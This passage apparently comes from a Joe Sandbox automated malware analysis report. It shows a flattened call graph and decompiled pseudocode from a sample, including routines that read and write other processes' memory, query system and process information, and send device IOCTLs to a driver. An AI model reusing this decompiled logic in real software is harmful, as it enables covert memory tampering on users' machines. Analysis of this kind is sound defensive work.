f663f2 4548->4549 4550 f6614a __freea 66 API calls 4549->4550 4551 f663fd 4550->4551 4552 f6614a __freea 66 API calls 4551->4552 4553 f66408 4552->4553 4554 f6614a __freea 66 API calls 4553->4554 4555 f66413 4554->4555 4556 f6614a __freea 66 API calls 4555->4556 4557 f6641e 4556->4557 4558 f6614a __freea 66 API calls 4557->4558 4559 f66429 4558->4559 4560 f6614a __freea 66 API calls 4559->4560 4561 f66437 4560->4561 4562 f6614a __freea 66 API calls 4561->4562 4563 f66442 4562->4563 4564 f6614a __freea 66 API calls 4563->4564 4565 f6644d 4564->4565 4566 f6614a __freea 66 API calls 4565->4566 4567 f66458 4566->4567 4568 f6614a __freea 66 API calls 4567->4568 4569 f66463 4568->4569 4570 f6614a __freea 66 API calls 4569->4570 4571 f6646e 4570->4571 4572 f6614a __freea 66 API calls 4571->4572 4573 f66479 4572->4573 4574 f6614a __freea 66 API calls 4573->4574 4575 f66484 4574->4575 4576 f6614a __freea 66 API calls 4575->4576 4577 f6648f 4576->4577 4578 f6614a __freea 66 API calls 4577->4578 4579 f6649a 4578->4579 4580 f6614a __freea 66 API calls 4579->4580 4581 f664a5 4580->4581 4582 f6614a __freea 66 API calls 4581->4582 4583 f664b0 4582->4583 4584 f6614a __freea 66 API calls 4583->4584 4585 f664bb 4584->4585 4586 f6614a __freea 66 API calls 4585->4586 4587 f664c6 4586->4587 4588 f6614a __freea 66 API calls 4587->4588 4589 f664d1 4588->4589 4590 f6614a __freea 66 API calls 4589->4590 4591 f664dc 4590->4591 4592 f6614a __freea 66 API calls 4591->4592 4593 f664ea 4592->4593 4594 f6614a __freea 66 API calls 4593->4594 4595 f664f5 4594->4595 4596 f6614a __freea 66 API calls 4595->4596 4597 f66500 4596->4597 4598 f6614a __freea 66 API calls 4597->4598 4599 f6650b 4598->4599 4600 f6614a __freea 66 API calls 4599->4600 4601 f66516 4600->4601 4602 f6614a __freea 66 API calls 4601->4602 4603 f66521 4602->4603 4604 f6614a __freea 66 API calls 4603->4604 4605 f6652c 4604->4605 4606 f6614a __freea 66 API calls 4605->4606 4607 f66537 4606->4607 4608 f6614a __freea 66 API calls 4607->4608 4609 f66542 4608->4609 4610 f6614a __freea 66 API calls 4609->4610 4611 f6654d 4610->4611 4612 f6614a __freea 66 API calls 4611->4612 4613 f66558 4612->4613 4614 f6614a __freea 66 API calls 4613->4614 4615 f66563 4614->4615 4616 f6614a __freea 66 API calls 4615->4616 4617 f6656e 4616->4617 4618 f6614a __freea 66 API calls 4617->4618 4619 f66579 4618->4619 4620 f6614a __freea 66 API calls 4619->4620 4621 f66584 4620->4621 4622 f6614a __freea 66 API calls 4621->4622 4623 f6658f 4622->4623 4624 f6614a __freea 66 API calls 4623->4624 4625 f6659d 4624->4625 4626 f6614a __freea 66 API calls 4625->4626 4627 f665a8 4626->4627 4628 f6614a __freea 66 API calls 4627->4628 4629 f665b3 4628->4629 4630 f6614a __freea 66 API calls 4629->4630 4631 f665be 4630->4631 4632 f6614a __freea 66 API calls 4631->4632 4633 f665c9 4632->4633 4634 f6614a __freea 66 API calls 4633->4634 4634->4635 4635->4399 4636->4420 3385 f628b9 3386 f6290c 3385->3386 3387 f629d4 3386->3387 3397 f6134e 3386->3397 3391 f6296d 3391->3387 3392 f61149 10 API calls 3391->3392 3393 f6298d 3392->3393 3393->3387 3437 f629ea 3393->3437 3396 f629ea 16 API calls 3396->3387 3398 f6139f 3397->3398 3400 f61384 3397->3400 3398->3387 3410 f61149 3398->3410 3399 f613ee GetModuleHandleW GetProcAddress 3403 f6140a 3399->3403 3400->3398 3400->3399 3401 f61397 3400->3401 3402 f613b5 3400->3402 3401->3398 3401->3399 3402->3398 3406 f6134e 10 API calls 3402->3406 3403->3398 3404 f61149 10 API calls 3403->3404 3405 f6141e 3404->3405 3407 f6134e 10 API calls 3405->3407 3409 f61435 LocalFree 3405->3409 3406->3398 3407->3409 3409->3398 3411 f61177 3410->3411 3412 f61238 3410->3412 3413 f61215 3411->3413 3414 f6117e 3411->3414 3415 f612b8 ReadProcessMemory 3412->3415 3420 f611e1 3412->3420 3421 f6124b 3412->3421 3418 f61223 WriteProcessMemory 3413->3418 3419 f612e9 GetModuleHandleW GetProcAddress 3413->3419 3416 f611ea 3414->3416 3417 f61182 3414->3417 3415->3420 3416->3419 3423 f611f8 3416->3423 3417->3420 3422 f6118b 3417->3422 3418->3420 3428 f61307 3419->3428 3420->3391 3421->3420 3421->3423 3425 f61251 3421->3425 3422->3419 3424 f61199 3422->3424 3457 f61000 3423->3457 3427 f6119f SetFilePointer 3424->3427 3430 f611b5 GetModuleHandleW GetProcAddress 3424->3430 3425->3420 3426 f6125a SetFilePointer 3425->3426 3426->3420 3426->3430 3427->3420 3427->3430 3428->3420 3431 f61149 DeviceIoControl 3428->3431 3430->3420 3433 f6131d 3431->3433 3434 f61339 LocalFree 3433->3434 3435 f61149 DeviceIoControl 3433->3435 3434->3420 3436 f61332 3435->3436 3436->3434 3438 f62a11 GetModuleHandleW GetProcAddress 3437->3438 3440 f62a68 3438->3440 3441 f629b2 3440->3441 3442 f61149 10 API calls 3440->3442 3441->3387 3441->3396 3443 f62a83 3442->3443 3444 f62b6e LocalFree 3443->3444 3445 f61149 10 API calls 3443->3445 3444->3441 3446 f62a9c 3445->3446 3446->3444 3447 f61149 10 API calls 3446->3447 3448 f62abb 3447->3448 3448->3444 3449 f61149 10 API calls 3448->3449 3450 f62aeb 3449->3450 3450->3444 3451 f62afb GetModuleHandleW GetProcAddress 3450->3451 3452 f62b13 3451->3452 3453 f62b6b 3452->3453 3454 f61149 10 API calls 3452->3454 3453->3444 3455 f62b35 LocalFree 3454->3455 3455->3453 3458 f61008 DeviceIoControl 3457->3458 3460 f61036 3458->3460 3460->3420 4852 f67c5a 4853 f64fb3 __amsg_exit 66 API calls 4852->4853 4854 f67c61 4853->4854 4637 f63b6c 4640 f65aff 4637->4640 4639 f63b71 4639->4639 4641 f65b24 4640->4641 4642 f65b31 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 4640->4642 4641->4642 4643 f65b28 4641->4643 4642->4643 4643->4639 4644 f63eb9 4654 f63e3d 4644->4654 4647 f63ee4 setSBCS 4648 f65f8e setSBUpLow 5 API calls 4647->4648 4650 f640a0 4648->4650 4649 f63f28 IsValidCodePage 4649->4647 4651 f63f3a GetCPInfo 4649->4651 4651->4647 4653 f63f4d setSBUpLow 4651->4653 4661 f63c09 GetCPInfo 4653->4661 4671 f6376d 4654->4671 4657 f63e5c GetOEMCP 4660 f63e6c 4657->4660 4658 f63e7a 4659 f63e7f GetACP 4658->4659 4658->4660 4659->4660 4660->4647 4660->4649 4660->4653 4662 f63c3d setSBUpLow 4661->4662 4663 f63cf1 4661->4663 4731 f65f4e 4662->4731 4666 f65f8e setSBUpLow 5 API calls 4663->4666 4668 f63d97 4666->4668 4668->4653 4670 f65e21 ___crtLCMapStringA 82 API calls 4670->4663 4672 f63780 4671->4672 4673 f637cd 4671->4673 4679 f64743 4672->4679 4673->4657 4673->4658 4677 f637ad 4677->4673 4699 f63d99 4677->4699 4680 f646ca __XcptFilter 66 API calls 4679->4680 4681 f6474b 4680->4681 4682 f64fb3 __amsg_exit 66 API calls 4681->4682 4683 f63785 4681->4683 4682->4683 4683->4677 4684 f6451a 4683->4684 4685 f64526 __CxxUnhandledExceptionFilter 4684->4685 4686 f64743 __getptd 66 API calls 4685->4686 4688 f6452b 4686->4688 4687 f64559 4690 f66117 ___crtLCMapStringA 66 API calls 4687->4690 4688->4687 4689 f6453d 4688->4689 4691 f64743 __getptd 66 API calls 4689->4691 4692 f64560 4690->4692 4698 f64542 4691->4698 4715 f644cd 4692->4715 4696 f64550 __CxxUnhandledExceptionFilter 4696->4677 4697 f64fb3 __amsg_exit 66 API calls 4697->4696 4698->4696 4698->4697 4700 f63da5 __CxxUnhandledExceptionFilter 4699->4700 4701 f64743 __getptd 66 API calls 4700->4701 4702 f63daa 4701->4702 4703 f66117 ___crtLCMapStringA 66 API calls 4702->4703 4711 f63dbc 4702->4711 4705 f63dda 4703->4705 4704 f63e23 4727 f63e34 4704->4727 4705->4704 4709 f63df1 InterlockedDecrement 4705->4709 4710 f63e0b InterlockedIncrement 4705->4710 4706 f63dca __CxxUnhandledExceptionFilter 4706->4673 4707 f64fb3 __amsg_exit 66 API calls 4707->4706 4709->4710 4712 f63dfc 4709->4712 4710->4704 4711->4706 4711->4707 4712->4710 4713 f6614a __freea 66 API calls 4712->4713 4714 f63e0a 4713->4714 4714->4710 4716 f6450f 4715->4716 4717 f644da 4715->4717 4723 f64587 4716->4723 4717->4716 4718 f6425a __XcptFilter 8 API calls 4717->4718 4719 f644f0 4718->4719 4719->4716 4720 f642e9 ___crtLCMapStringA 8 API calls 4719->4720 4721 f644fb 4720->4721 4721->4716 4722 f64382 ___crtLCMapStringA 66 API calls 4721->4722 4722->4716 4726 f6603e LeaveCriticalSection 4723->4726 4725 f6458e 4725->4698 4726->4725 4730 f6603e LeaveCriticalSection 4727->4730 4729 f63e3b 4729->4711 4730->4729 4732 f6376d ___crtLCMapStringA 76 API calls 4731->4732 4733 f65f61 4732->4733 4741 f65e67 4733->4741 4736 f65e21 4737 f6376d ___crtLCMapStringA 76 API calls 4736->4737 4738 f65e34 4737->4738 4758 f65c3a 4738->4758 4742 f65e85 4741->4742 4743 f65e90 MultiByteToWideChar 4741->4743 4742->4743 4747 f65ebd 4743->4747 4753 f65eb9 4743->4753 4744 f65f8e setSBUpLow 5 API calls 4745 f63cac 4744->4745 4745->4736 4746 f65ed2 setSBUpLow __alloca_probe_16 4749 f65f0b MultiByteToWideChar 4746->4749 4746->4753 4747->4746 4748 f677dc ___crtLCMapStringA 66 API calls 4747->4748 4748->4746 4750 f65f32 4749->4750 4751 f65f21 GetStringTypeW 4749->4751 4754 f65c1a 4750->4754 4751->4750 4753->4744 4755 f65c37 4754->4755 4756 f65c26 4754->4756 4755->4753 4756->4755 4757 f6614a __freea 66 API calls 4756->4757 4757->4755 4759 f65c58 MultiByteToWideChar 4758->4759 4761 f65cbd 4759->4761 4772 f65cb6 4759->4772 4765 f677dc ___crtLCMapStringA 66 API calls 4761->4765 4771 f65cd6 __alloca_probe_16 4761->4771 4762 f65f8e setSBUpLow 5 API calls 4763 f63ccc 4762->4763 4763->4670 4764 f65d0a MultiByteToWideChar 4766 f65d23 LCMapStringW 4764->4766 4767 f65e02 4764->4767 4765->4771 4766->4767 4768 f65d42 4766->4768 4769 f65c1a __freea 66 API calls 4767->4769 4770 f65d4c 4768->4770 4775 f65d75 4768->4775 4769->4772 4770->4767 4773 f65d60 LCMapStringW 4770->4773 4771->4764 4771->4772 4772->4762 4773->4767 4774 f65d90 __alloca_probe_16 4774->4767 4776 f65dc4 LCMapStringW 4774->4776 4775->4774 4779 f677dc ___crtLCMapStringA 66 API calls 4775->4779 4777 f65dfc 4776->4777 4778 f65dda WideCharToMultiByte 4776->4778 4780 f65c1a __freea 66 API calls 4777->4780 4778->4777 4779->4774 4780->4767 4860 f63b2e 4863 f651df 4860->4863 4864 f646ca __XcptFilter 66 API calls 4863->4864 4865 f63b3f 4864->4865 4855 f627d9 4856 f627dd LocalFree 4855->4856 4859 f6280e LocalFree 4856->4859 4235 f6704a 4236 f661c9 __XcptFilter 66 API calls 4235->4236 4237 f67056 EncodePointer 4236->4237 4238 f6706f 4237->4238 4866 f62566 4867 f62575 4866->4867 4868 f62687 4866->4868 4869 f62582 GetModuleHandleW GetProcAddress 4867->4869 4872 f62642 4867->4872 4870 f625a2 4869->4870 4870->4868 4871 f625af 8 API calls 4870->4871 4871->4868 4871->4872 4872->4868 4874 f626ba 4872->4874 4875 f626d1 4874->4875 4876 f62726 GetModuleHandleW GetProcAddress 4875->4876 4878 f627c7 4875->4878 4877 f6274e 4876->4877 4877->4878 4879 f627b2 GetModuleHandleW GetProcAddress 4877->4879 4878->4868 4879->4878

    Executed Functions

    Function 00F618D9, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 42
    C-Code - Quality: 79%
    			E00F618D9(void** __esi, union _SYSTEMINFOCLASS _a4) {
				union _SYSTEMINFOCLASS _v4;
				void* _t3;
				_Unknown_base(*)()* _t5;
				void* _t6;
				long _t8;
				long _t12;
				long _t14;
				void** _t15;

				_t15 = __esi;
				_t3 =  *__esi;
				_t14 = 0xc0000004;
				if(_t3 == 0) {
					_t12 = 0x1000;
					while(1) {
						_t5 = GetProcAddress(GetModuleHandleW(L"kernel32"), "LocalAlloc"); // executed
						_t6 =  *_t5(0x40, _t12); // executed
						 *_t15 = _t6;
						if(_t6 == 0) {
							break;
						}
						_t8 = NtQuerySystemInformation(_v4, _t6, _t12, 0); // executed
						_t14 = _t8;
						if(_t14 < 0) {
							LocalFree( *_t15);
						}
						_t12 = _t12 + _t12;
						if(_t14 == 0xc0000004) {
							continue;
						}
						break;
					}
				} else {
					_t14 = NtQuerySystemInformation(_a4, _t3, 0, 0);
				}
				return _t14;
			}











    0x00f618d9
    0x00f618d9
    0x00f618dc
    0x00f618e3
    0x00f618f9
    0x00f618fe
    0x00f61912
    0x00f61918
    0x00f6191a
    0x00f6191e
    0x00000000
    0x00000000
    0x00f61928
    0x00f6192e
    0x00f61932
    0x00f61936
    0x00f61936
    0x00f6193c
    0x00f61944
    0x00000000
    0x00000000
    0x00000000
    0x00f61944
    0x00f618e5
    0x00f618f4
    0x00f618f4
    0x00f6194a

    APIs
    • NtQuerySystemInformation.NTDLL(00000000,00000000,00000000,00000000,00000000,00F619B7,00000005), ref: 00F618EE
    • GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,00001000,?,00000000,00F619B7,00000005), ref: 00F6190B
    • GetProcAddress.KERNEL32(00000000,?,00000000,00F619B7,00000005), ref: 00F61912
    • NtQuerySystemInformation.NTDLL(?,00000000,00001000,00000000,?,00000000,00F619B7,00000005), ref: 00F61928
    • LocalFree.KERNEL32(?,?,00000000,00F619B7,00000005), ref: 00F61936
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1689369576.00F61000.00000020.sdmp, Offset: 00F60000, based on PE: true
    • Associated: 00000005.00000002.1689363080.00F60000.00000002.sdmp
    • Associated: 00000005.00000002.1689377239.00F68000.00000002.sdmp
    • Associated: 00000005.00000002.1689384429.00F6B000.00000004.sdmp
    • Associated: 00000005.00000002.1689391890.00F6D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_f60000_F915.jbxd
    Function 00F61D5F, Relevance: 4.6, APIs: 3, Instructions: 60
    C-Code - Quality: 50%
    			E00F61D5F(char __eax, intOrPtr* __ecx) {
				signed int _v8;
				long _v12;
				intOrPtr* _v16;
				signed int _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v48;
				void _v52;
				void* _t20;
				long _t22;
				signed int _t23;
				signed int _t26;
				char _t31;
				intOrPtr* _t32;
				intOrPtr _t34;
				union _PROCESSINFOCLASS _t36;

				_v8 = _v8 & 0x00000000;
				_t32 = __ecx;
				_t31 = __eax;
				if( *__ecx != 1) {
					_t20 = GetCurrentProcess();
				} else {
					_t20 =  *( *(__ecx + 4));
				}
				_v20 = _v20 & 0x00000000;
				_v16 = _t32;
				_t34 =  *_t32;
				_v28 = _t31;
				_v24 = 0xf6cd30;
				if(_t34 == 0) {
					__imp__RtlGetCurrentPeb();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v8 = 1;
				} else {
					_t36 = _t34 - 1;
					if(_t36 == 0) {
						_t22 = NtQueryInformationProcess(_t20, _t36,  &_v52, 0x18,  &_v12); // executed
						if(_t22 >= 0 && _v12 == 0x18) {
							_t23 = _v48;
							if(_t23 != 0) {
								_v20 = _t23;
								_t26 = E00F61149( &_v28,  &_v20, 0x10); // executed
								_v8 = _t26;
							}
						}
					}
				}
				return _v8;
			}



















    0x00f61d65
    0x00f61d6a
    0x00f61d70
    0x00f61d72
    0x00f61d7b
    0x00f61d74
    0x00f61d77
    0x00f61d77
    0x00f61d81
    0x00f61d85
    0x00f61d8a
    0x00f61d8d
    0x00f61d90
    0x00f61d97
    0x00f61dde
    0x00f61de6
    0x00f61de7
    0x00f61de8
    0x00f61de9
    0x00f61dea
    0x00f61d99
    0x00f61d99
    0x00f61d9a
    0x00f61da8
    0x00f61db0
    0x00f61db8
    0x00f61dbd
    0x00f61dbf
    0x00f61dcc
    0x00f61dd4
    0x00f61dd4
    0x00f61dbd
    0x00f61db0
    0x00f61d9a
    0x00f61ddd

    APIs
    • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,00F61CA8), ref: 00F61D7B
    • NtQueryInformationProcess.NTDLL(00000000,?,?,00000018,?), ref: 00F61DA8
      • Part of subcall function 00F61149: SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 00F611A7
      • Part of subcall function 00F61149: GetModuleHandleW.KERNEL32(kernel32,ReadFile,?,?,?,?,00000000), ref: 00F611D2
      • Part of subcall function 00F61149: GetProcAddress.KERNEL32(00000000), ref: 00F611D9
      • Part of subcall function 00F61149: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 00F61230
      • Part of subcall function 00F61149: SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 00F61263
      • Part of subcall function 00F61149: ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 00F612C5
      • Part of subcall function 00F61149: GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,?), ref: 00F612F8
      • Part of subcall function 00F61149: GetProcAddress.KERNEL32(00000000), ref: 00F612FF
      • Part of subcall function 00F61149: LocalFree.KERNEL32(?), ref: 00F6133D
    • RtlGetCurrentPeb.NTDLL ref: 00F61DDE
    Memory Dump Source
    • Source File: 00000005.00000002.1689369576.00F61000.00000020.sdmp, Offset: 00F60000, based on PE: true
    • Associated: 00000005.00000002.1689363080.00F60000.00000002.sdmp
    • Associated: 00000005.00000002.1689377239.00F68000.00000002.sdmp
    • Associated: 00000005.00000002.1689384429.00F6B000.00000004.sdmp
    • Associated: 00000005.00000002.1689391890.00F6D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_f60000_F915.jbxd
    Function 00F64CD8, Relevance: 1.5, APIs: 1, Instructions: 4
    C-Code - Quality: 100%
    			E00F64CD8() {

				SetUnhandledExceptionFilter(E00F64C96);
				return 0;
			}



    0x00f64cdd
    0x00f64ce5

    APIs
    • SetUnhandledExceptionFilter.KERNEL32(Function_00004C96), ref: 00F64CDD
    Memory Dump Source
    • Source File: 00000005.00000002.1689369576.00F61000.00000020.sdmp, Offset: 00F60000, based on PE: true
    • Associated: 00000005.00000002.1689363080.00F60000.00000002.sdmp
    • Associated: 00000005.00000002.1689377239.00F68000.00000002.sdmp
    • Associated: 00000005.00000002.1689384429.00F6B000.00000004.sdmp
    • Associated: 00000005.00000002.1689391890.00F6D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_f60000_F915.jbxd
    Function 00F6488C, Relevance: 33.4, APIs: 14, Strings: 5, Instructions: 109
    C-Code - Quality: 62%
    			E00F6488C(void* __ebx) {
				void* __edi;
				void* __esi;
				_Unknown_base(*)()* _t7;
				long _t10;
				void* _t11;
				int _t12;
				void* _t14;
				void* _t15;
				void* _t16;
				void* _t18;
				intOrPtr _t21;
				long _t26;
				void* _t30;
				struct HINSTANCE__* _t35;
				intOrPtr* _t36;
				void* _t39;
				intOrPtr* _t41;
				void* _t42;

				_t30 = __ebx;
				_t35 = GetModuleHandleW(L"KERNEL32.DLL");
				if(_t35 != 0) {
					 *0xf6bfe8 = GetProcAddress(_t35, "FlsAlloc");
					 *0xf6bfec = GetProcAddress(_t35, "FlsGetValue");
					 *0xf6bff0 = GetProcAddress(_t35, "FlsSetValue");
					_t7 = GetProcAddress(_t35, "FlsFree");
					__eflags =  *0xf6bfe8;
					_t39 = TlsSetValue;
					 *0xf6bff4 = _t7;
					if( *0xf6bfe8 == 0) {
						L6:
						 *0xf6bfec = TlsGetValue;
						 *0xf6bfe8 = E00F6459C;
						 *0xf6bff0 = _t39;
						 *0xf6bff4 = TlsFree;
					} else {
						__eflags =  *0xf6bfec;
						if( *0xf6bfec == 0) {
							goto L6;
						} else {
							__eflags =  *0xf6bff0;
							if( *0xf6bff0 == 0) {
								goto L6;
							} else {
								__eflags = _t7;
								if(_t7 == 0) {
									goto L6;
								}
							}
						}
					}
					_t10 = TlsAlloc();
					 *0xf6b778 = _t10;
					__eflags = _t10 - 0xffffffff;
					if(_t10 == 0xffffffff) {
						L15:
						_t11 = 0;
						__eflags = 0;
					} else {
						_t12 = TlsSetValue(_t10,  *0xf6bfec);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L15;
						} else {
							E00F64D3B();
							_t41 = __imp__EncodePointer;
							_t14 =  *_t41( *0xf6bfe8);
							 *0xf6bfe8 = _t14;
							_t15 =  *_t41( *0xf6bfec);
							 *0xf6bfec = _t15;
							_t16 =  *_t41( *0xf6bff0);
							 *0xf6bff0 = _t16;
							 *0xf6bff4 =  *_t41( *0xf6bff4);
							_t18 = E00F65F9D();
							__eflags = _t18;
							if(_t18 == 0) {
								L14:
								E00F645D9();
								goto L15;
							} else {
								_t36 = __imp__DecodePointer;
								_t21 =  *((intOrPtr*)( *_t36()))( *0xf6bfe8, E00F6475D);
								 *0xf6b774 = _t21;
								__eflags = _t21 - 0xffffffff;
								if(_t21 == 0xffffffff) {
									goto L14;
								} else {
									_t42 = E00F661C9(1, 0x214);
									__eflags = _t42;
									if(_t42 == 0) {
										goto L14;
									} else {
										__eflags =  *((intOrPtr*)( *_t36()))( *0xf6bff0,  *0xf6b774, _t42);
										if(__eflags == 0) {
											goto L14;
										} else {
											_push(0);
											_push(_t42);
											E00F64616(_t30, _t36, _t42, __eflags);
											_t26 = GetCurrentThreadId();
											 *(_t42 + 4) =  *(_t42 + 4) | 0xffffffff;
											 *_t42 = _t26;
											_t11 = 1;
										}
									}
								}
							}
						}
					}
					return _t11;
				} else {
					E00F645D9();
					return 0;
				}
			}





















    0x00f6488c
    0x00f6489a
    0x00f6489e
    0x00f648be
    0x00f648cb
    0x00f648d8
    0x00f648dd
    0x00f648df
    0x00f648e6
    0x00f648ec
    0x00f648f1
    0x00f64909
    0x00f6490e
    0x00f64918
    0x00f64922
    0x00f64928
    0x00f648f3
    0x00f648f3
    0x00f648fa
    0x00000000
    0x00f648fc
    0x00f648fc
    0x00f64903
    0x00000000
    0x00f64905
    0x00f64905
    0x00f64907
    0x00000000
    0x00000000
    0x00f64907
    0x00f64903
    0x00f648fa
    0x00f6492d
    0x00f64933
    0x00f64938
    0x00f6493b
    0x00f64a02
    0x00f64a02
    0x00f64a02
    0x00f64941
    0x00f64948
    0x00f6494a
    0x00f6494c
    0x00000000
    0x00f64952
    0x00f64952
    0x00f6495d
    0x00f64963
    0x00f6496b
    0x00f64970
    0x00f64978
    0x00f6497d
    0x00f64985
    0x00f6498c
    0x00f64991
    0x00f64996
    0x00f64998
    0x00f649fd
    0x00f649fd
    0x00000000
    0x00f6499a
    0x00f6499a
    0x00f649ad
    0x00f649af
    0x00f649b4
    0x00f649b7
    0x00000000
    0x00f649b9
    0x00f649c5
    0x00f649c9
    0x00f649cb
    0x00000000
    0x00f649cd
    0x00f649de
    0x00f649e0
    0x00000000
    0x00f649e2
    0x00f649e2
    0x00f649e4
    0x00f649e5
    0x00f649ec
    0x00f649f2
    0x00f649f6
    0x00f649fa
    0x00f649fa
    0x00f649e0
    0x00f649cb
    0x00f649b7
    0x00f64998
    0x00f6494c
    0x00f64a06
    0x00f648a0
    0x00f648a0
    0x00f648a8
    0x00f648a8

    APIs
    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,00F63A8B,00F69DC8,00000014), ref: 00F64894
    • GetProcAddress.KERNEL32(00000000,FlsAlloc,00000000,?,00F63A8B,00F69DC8,00000014), ref: 00F648B6
    • GetProcAddress.KERNEL32(00000000,FlsGetValue,?,00F63A8B,00F69DC8,00000014), ref: 00F648C3
    • GetProcAddress.KERNEL32(00000000,FlsSetValue,?,00F63A8B,00F69DC8,00000014), ref: 00F648D0
    • GetProcAddress.KERNEL32(00000000,FlsFree,?,00F63A8B,00F69DC8,00000014), ref: 00F648DD
    • TlsAlloc.KERNEL32(?,00F63A8B,00F69DC8,00000014), ref: 00F6492D
    • TlsSetValue.KERNEL32(00000000,?,00F63A8B,00F69DC8,00000014), ref: 00F64948
    • EncodePointer.KERNEL32(?,00F63A8B,00F69DC8,00000014), ref: 00F64963
    • EncodePointer.KERNEL32(?,00F63A8B,00F69DC8,00000014), ref: 00F64970
    • EncodePointer.KERNEL32(?,00F63A8B,00F69DC8,00000014), ref: 00F6497D
    • EncodePointer.KERNEL32(?,00F63A8B,00F69DC8,00000014), ref: 00F6498A
      • Part of subcall function 00F65F9D: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000FA0), ref: 00F65FC5
    • DecodePointer.KERNEL32(00F6475D,?,00F63A8B,00F69DC8,00000014), ref: 00F649AB
      • Part of subcall function 00F661C9: Sleep.KERNEL32(00000000), ref: 00F661F1
    • DecodePointer.KERNEL32(00000000,?,00F63A8B,00F69DC8,00000014), ref: 00F649DA
      • Part of subcall function 00F64616: GetModuleHandleW.KERNEL32(KERNEL32.DLL,00F69E48,00000008,00F6471E,00000000,00000000,?,?,00F6474B,?,00F63785), ref: 00F64627
      • Part of subcall function 00F64616: InterlockedIncrement.KERNEL32(00F6B008), ref: 00F64668
    • GetCurrentThreadId.KERNEL32(?,00F63A8B,00F69DC8,00000014), ref: 00F649EC
      • Part of subcall function 00F645D9: DecodePointer.KERNEL32(FFFFFFFF,00F64A02,?,00F63A8B,00F69DC8,00000014), ref: 00F645EA
      • Part of subcall function 00F645D9: TlsFree.KERNEL32(FFFFFFFF,00F64A02,?,00F63A8B,00F69DC8,00000014), ref: 00F64604
      • Part of subcall function 00F645D9: DeleteCriticalSection.KERNEL32(00000000,00000000,0000A47E,?,00F64A02,?,00F63A8B,00F69DC8,00000014), ref: 00F66004
      • Part of subcall function 00F645D9: DeleteCriticalSection.KERNEL32(FFFFFFFF,0000A47E,?,00F64A02,?,00F63A8B,00F69DC8,00000014), ref: 00F6602E
    Strings
    Memory Dump Source
    • Source File: 00000005.00000001.1688583422.00F61000.00000020.sdmp, Offset: 00F60000, based on PE: true
    • Associated: 00000005.00000001.1688551748.00F60000.00000002.sdmp
    • Associated: 00000005.00000001.1688595430.00F68000.00000002.sdmp
    • Associated: 00000005.00000001.1688625204.00F6B000.00000008.sdmp
    • Associated: 00000005.00000001.1688653195.00F6C000.00000004.sdmp
    • Associated: 00000005.00000001.1688693952.00F6D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_1_f60000_F915.jbxd
    Function 00F61149, Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 174
    C-Code - Quality: 56%
    			E00F61149(void** _a4, void** _a8, long _a12) {
				intOrPtr _v8;
				LONG* _v12;
				char _v16;
				LONG* _v20;
				intOrPtr _v28;
				void* __esi;
				long _t45;
				int _t49;
				LONG* _t63;
				void* _t79;
				void* _t81;
				void* _t82;
				void* _t83;
				void* _t86;
				void* _t89;
				long _t92;
				void** _t94;
				long* _t97;
				long* _t99;
				void** _t100;

				_t94 = _a4;
				_t45 = _t94[1];
				_v12 = 0;
				_v8 = 0xf6cd30;
				_t79 =  *_t45;
				_v20 = 0;
				if(_t79 == 0) {
					_t97 = _a8;
					_t45 = _t97[1];
					_t81 =  *_t45;
					if(_t81 == 0) {
						E00F668B0( *_t94,  *_t97, _a12);
						_v20 = 1;
						L30:
						return _v20;
					}
					_t82 = _t81 - 1;
					if(_t82 == 0) {
						_t49 = ReadProcessMemory( *( *(_t45 + 4)),  *_t97,  *_t94, _a12, 0); // executed
						L9:
						_v20 = _t49;
						goto L30;
					}
					_t83 = _t82 - 1;
					if(_t83 == 0) {
						_t49 = E00F61560( *( *(_t45 + 4)),  *_t94,  *_t97, _a12);
						goto L9;
					}
					_t84 = _t83 - 1;
					if(_t84 == 0) {
						_push(0);
						_push( *_t97);
						_t99 =  &_a12;
						_push(0x22c183);
						L12:
						_push( *( *(_t45 + 4)));
						_t49 = E00F61000(_t94, _t84, _t99);
						goto L9;
					}
					if(_t84 != 3 || SetFilePointer( *( *(_t45 + 4)),  *_t97, 0, 0) == 0xffffffff) {
						goto L30;
					} else {
						_push(0);
						_push( &_v16);
						_push(_a12);
						_push( *_t94);
						_push( *((intOrPtr*)( *((intOrPtr*)(_t97[1] + 4)))));
						_push("ReadFile");
						L8:
						_t49 =  *(GetProcAddress(GetModuleHandleW(L"kernel32"), ??))();
						goto L9;
					}
				}
				_t86 = _t79 - 1;
				if(_t86 == 0) {
					_t100 = _a8;
					if( *(_t100[1]) != 0) {
						L26:
						_push(_a12);
						_push(0x40);
						_t63 =  *(GetProcAddress(GetModuleHandleW(L"kernel32"), "LocalAlloc"))();
						_v20 = _t63;
						if(_t63 != 0) {
							if(E00F61149( &_v20, _t100, _a12) != 0) {
								_v28 = E00F61149(_t94,  &_v20, _a12);
							}
							LocalFree(_v20);
						}
						goto L30;
					}
					_t49 = WriteProcessMemory( *( *(_t45 + 4)),  *_t94,  *_t100, _a12, 0);
					goto L9;
				}
				_t89 = _t86;
				if(_t89 == 0) {
					_t100 = _a8;
					_t84 = _t100[1];
					if( *(_t100[1]) != 0) {
						goto L26;
					}
					_push(_a12);
					_push( *_t100);
					_t99 = 0;
					_push(0x22c187);
					goto L12;
				}
				if(_t89 != 3) {
					goto L30;
				}
				_t100 = _a8;
				if( *(_t100[1]) != 0) {
					goto L26;
				}
